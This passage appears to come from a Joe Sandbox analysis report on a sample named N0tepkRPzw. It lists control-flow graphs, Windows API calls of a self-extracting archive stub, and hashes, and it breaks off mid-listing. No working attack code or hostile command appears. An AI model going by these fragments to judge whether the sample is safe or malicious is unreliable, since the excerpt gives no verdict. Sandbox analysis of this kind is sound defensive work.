              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3To
              • API String ID: 3498096277-2168385784
              • Opcode ID: 5df73a73128f3ed64e546a874cdd953edf7b682c836d8345a97357221184db52
              • Instruction ID: 5afd72ce86b590cb25a54bdbc93197d5066e5be5059c393f97ce45c78a8c99a9
              • Opcode Fuzzy Hash: 5df73a73128f3ed64e546a874cdd953edf7b682c836d8345a97357221184db52
              • Instruction Fuzzy Hash: 97F0ECB5900209EBCB10AF9998499EFFBFCEF95701F00415AE814E2211DBB456058BB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 940 d599b0-d599d1 call d6e360 943 d599d3-d599d6 940->943 944 d599dc 940->944 943->944 945 d599d8-d599da 943->945 946 d599de-d599fb 944->946 945->946 947 d59a03-d59a0d 946->947 948 d599fd 946->948 949 d59a12-d59a31 call d570bf 947->949 950 d59a0f 947->950 948->947 953 d59a33 949->953 954 d59a39-d59a57 CreateFileW 949->954 950->949 953->954 955 d59a59-d59a7b GetLastError call d5b66c 954->955 956 d59abb-d59ac0 954->956 965 d59a7d-d59a9f CreateFileW GetLastError 955->965 966 d59aaa-d59aaf 955->966 958 d59ae1-d59af5 956->958 959 d59ac2-d59ac5 956->959 960 d59af7-d59b0f call d5fe56 958->960 961 d59b13-d59b1e 958->961 959->958 963 d59ac7-d59adb SetFileTime 959->963 960->961 963->958 968 d59aa5-d59aa8 965->968 969 d59aa1 965->969 966->956 970 d59ab1 966->970 968->956 968->966 969->968 970->956
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D578AD,?,00000005,?,00000011), ref: 00D59A4C
              • GetLastError.KERNEL32(?,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D578AD,?,00000005,?), ref: 00D59A8E
              • GetLastError.KERNEL32(?,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59ADB
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: 0db76dd0eebe0f5978f3f3aa9e7a47c17ed9d4ca6cc7e45c8affe750754cdcf6
              • Instruction ID: f32a7950ee4facb3335adc0da902efe8a236824af63234f2109884ce5a2aad51
              • Opcode Fuzzy Hash: 0db76dd0eebe0f5978f3f3aa9e7a47c17ed9d4ca6cc7e45c8affe750754cdcf6
              • Instruction Fuzzy Hash: 07412170544746AFEB208F20CC06BDAFBD4EB01325F140719FDA8962D1E7B5A98C8BB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 999 d6ac74-d6ac8d PeekMessageW 1000 d6ac8f-d6aca3 GetMessageW 999->1000 1001 d6acc8-d6accc 999->1001 1002 d6acb4-d6acc2 TranslateMessage DispatchMessageW 1000->1002 1003 d6aca5-d6acb2 IsDialogMessageW 1000->1003 1002->1001 1003->1001 1003->1002
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
              • IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
              • TranslateMessage.USER32(?), ref: 00D6ACB8
              • DispatchMessageW.USER32(?), ref: 00D6ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 62dcbae21ae2ca1e64ee5f908772c9729a0ca495183b108591c4b324dd120bb9
              • Instruction ID: eae109be3752ad6fbc1636600ef225270e915518eb354ac672ee94756a4b1921
              • Opcode Fuzzy Hash: 62dcbae21ae2ca1e64ee5f908772c9729a0ca495183b108591c4b324dd120bb9
              • Instruction Fuzzy Hash: 0BF0D072D01229EBCB20ABE6DC4CDEB7F6CEE057917454615F915D2210EB34D505CBB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1004 d6a2c7-d6a2e6 GetClassNameW 1005 d6a30e-d6a310 1004->1005 1006 d6a2e8-d6a2fd call d617ac 1004->1006 1007 d6a312-d6a315 SHAutoComplete 1005->1007 1008 d6a31b-d6a31f 1005->1008 1011 d6a2ff-d6a30b FindWindowExW 1006->1011 1012 d6a30d 1006->1012 1007->1008 1011->1012 1012->1005
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00D6A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D6A315
                • Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D6A305
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: bcf3faa190c5a8f275515e6e7753d48d85898c859942275bc0b27e738adf34e5
              • Instruction ID: db3477cbcd21acca7691dc179ec2720325fac77620ce435978d9de966727977f
              • Opcode Fuzzy Hash: bcf3faa190c5a8f275515e6e7753d48d85898c859942275bc0b27e738adf34e5
              • Instruction Fuzzy Hash: CBF08232A01328B7E72066689C05FEB77AC9B46B51F480256BD45F6380D7609D45CAF6

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1013 d6d287-d6d2b2 call d6e360 SetEnvironmentVariableW call d5fbd8 1017 d6d2b7-d6d2bb 1013->1017 1018 d6d2df-d6d2e3 1017->1018 1019 d6d2bd-d6d2c1 1017->1019 1020 d6d2ca-d6d2d1 call d5fcf1 1019->1020 1023 d6d2c3-d6d2c9 1020->1023 1024 d6d2d3-d6d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1018
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D6D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6D2D9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: 5b5319d156e3e84e0df1a4c5e40dbd8b2f3b223a6508f1cab61f1c0f69cc95bd
              • Instruction ID: b35f229ead9446f1546873a0fd39597549a859dc1bbaba7239b67325113288e9
              • Opcode Fuzzy Hash: 5b5319d156e3e84e0df1a4c5e40dbd8b2f3b223a6508f1cab61f1c0f69cc95bd
              • Instruction Fuzzy Hash: 01F0A072D11328A7CB202F90AC1AEBE7B99EF09B42B040021FC88A6241D660CD44DBF5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1025 d5984e-d5985a 1026 d59867-d5987e ReadFile 1025->1026 1027 d5985c-d59864 GetStdHandle 1025->1027 1028 d59880-d59889 call d59989 1026->1028 1029 d598da 1026->1029 1027->1026 1033 d598a2-d598a6 1028->1033 1034 d5988b-d59893 1028->1034 1031 d598dd-d598e2 1029->1031 1036 d598b7-d598bb 1033->1036 1037 d598a8-d598b1 GetLastError 1033->1037 1034->1033 1035 d59895 1034->1035 1040 d59896-d598a0 call d5984e 1035->1040 1038 d598d5-d598d8 1036->1038 1039 d598bd-d598c5 1036->1039 1037->1036 1041 d598b3-d598b5 1037->1041 1038->1031 1039->1038 1042 d598c7-d598d0 GetLastError 1039->1042 1040->1031 1041->1031 1042->1038 1044 d598d2-d598d3 1042->1044 1044->1040
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00D5985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D59876
              • GetLastError.KERNEL32 ref: 00D598A8
              • GetLastError.KERNEL32 ref: 00D598C7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 30a3b3189935449a9a5923b1f6c4741a7590922da83c10226e0d471f6f535e9e
              • Instruction ID: 6650b562795bdcd98ec324e53abbfba8ce6efd7b1c171525b107757b0cdfdbaa
              • Opcode Fuzzy Hash: 30a3b3189935449a9a5923b1f6c4741a7590922da83c10226e0d471f6f535e9e
              • Instruction Fuzzy Hash: 26117C30900704EBDF205F51C824A69BFA9EB16732F28862AFC6AC5690D735DE489F71
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D73713,00000000,00000000,?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue), ref: 00D7A526
              • GetLastError.KERNEL32(?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue,00D87348,00D87350,00000000,00000364,?,00D79077), ref: 00D7A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue,00D87348,00D87350,00000000), ref: 00D7A540
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 9cf36ab65f28c9b04027ee335ae8328fb11e2b6cf8ce7f1f76560444cdabb41b
              • Instruction ID: 3d36e63baa7ae560cbf04ed8cf6eac3c7fba09bfc03d950e51e3b7f514a973e9
              • Opcode Fuzzy Hash: 9cf36ab65f28c9b04027ee335ae8328fb11e2b6cf8ce7f1f76560444cdabb41b
              • Instruction Fuzzy Hash: B701DB36721326EBC7218B6DDC44A6A7B98EF85FA1B248624F90ED7240E731D900C7F1
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D5CC94,00000001,?,?,?,00000000,00D64ECD,?,?,?), ref: 00D59F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D64ECD,?,?,?,?,?,00D64972,?), ref: 00D59F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D5CC94,00000001,?,?), ref: 00D59FB8
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: 71c1ae1303a9c18ee8e4660a4b2cf23afac24f701ede49e4c3ef255e2ca29288
              • Instruction ID: 9462c69b51e555624d0b543ca4146b7ec322bf0de32158f6fbca715ef02c3f45
              • Opcode Fuzzy Hash: 71c1ae1303a9c18ee8e4660a4b2cf23afac24f701ede49e4c3ef255e2ca29288
              • Instruction Fuzzy Hash: 8631E471208315DBDF208F18D858B6ABBA4EF50B56F084659FC49DB281C774D94CCBB2
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A261
              • GetLastError.KERNEL32(?,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A27E
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: f0075f4d52268176fc3d0576ac67317da4d97b283970572552b87d5edac96413
              • Instruction ID: 2382d8495a5160e31e05e1e071c8444415c7c88d718b7812bdc4720cc37eaf35
              • Opcode Fuzzy Hash: f0075f4d52268176fc3d0576ac67317da4d97b283970572552b87d5edac96413
              • Instruction Fuzzy Hash: 360192311502346ADF329B7C4C07BED3348AF06B83F085652FD45DA151DB66CA8986BB
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D7B019
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: 607b728009e91d581dce5c831dc088ba20e12df8ed68daa6cbab0138e5454388
              • Instruction ID: 149fdfa0e220eea2557685fd5727b93f45688a95906516271ac40bd7570213b5
              • Opcode Fuzzy Hash: 607b728009e91d581dce5c831dc088ba20e12df8ed68daa6cbab0138e5454388
              • Instruction Fuzzy Hash: CF41F57050434C9EDF218A28CC95BFABBA9EB45318F5844EEE99E87142F3359A458F70
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D7A79D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: bf9a1a998c6b171b2edd7fe3b7ac9f381f5512c9a96c2fafd1d30cf01ff07c51
              • Instruction ID: 65f98625863dd89eae7ff27a4a375a3560a40b95b09e0460a73893abb6a0cf86
              • Opcode Fuzzy Hash: bf9a1a998c6b171b2edd7fe3b7ac9f381f5512c9a96c2fafd1d30cf01ff07c51
              • Instruction Fuzzy Hash: AC01E57254420DBBCF066FA4DC06DEE3F66EF48760F058164FE1866160DA72D931EBA2
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D79D2F), ref: 00D7A715
              Strings
              • InitializeCriticalSectionEx, xrefs: 00D7A6E5
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 5dacb97b18b5dd655f10a3ddd1854cab22b26d16b9b0933c94eb1e01f2e2fffc
              • Instruction ID: 935dccc83a1f665992c8025312ee72ad5b6da00f97c244f572be3c51a86f31e4
              • Opcode Fuzzy Hash: 5dacb97b18b5dd655f10a3ddd1854cab22b26d16b9b0933c94eb1e01f2e2fffc
              • Instruction Fuzzy Hash: 01F0E23164531CFBCB056F64DC06DAE7F61EF84B60B408164FC1D5A260EA728E20EBB1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: 512b0cbeb974707019d075c01d8fffd75312200ac90db4ece4bdb3535af4ca1a
              • Instruction ID: dd7acf40462e435b4c37495aa470565cdfc246be5433ac4f1a5bb36dcf295cb8
              • Opcode Fuzzy Hash: 512b0cbeb974707019d075c01d8fffd75312200ac90db4ece4bdb3535af4ca1a
              • Instruction Fuzzy Hash: 98E0E570B55328AFC2107B68AC069AEBB54DB95F21B414155FC0D97350FD718E0097F6
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00D732AF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
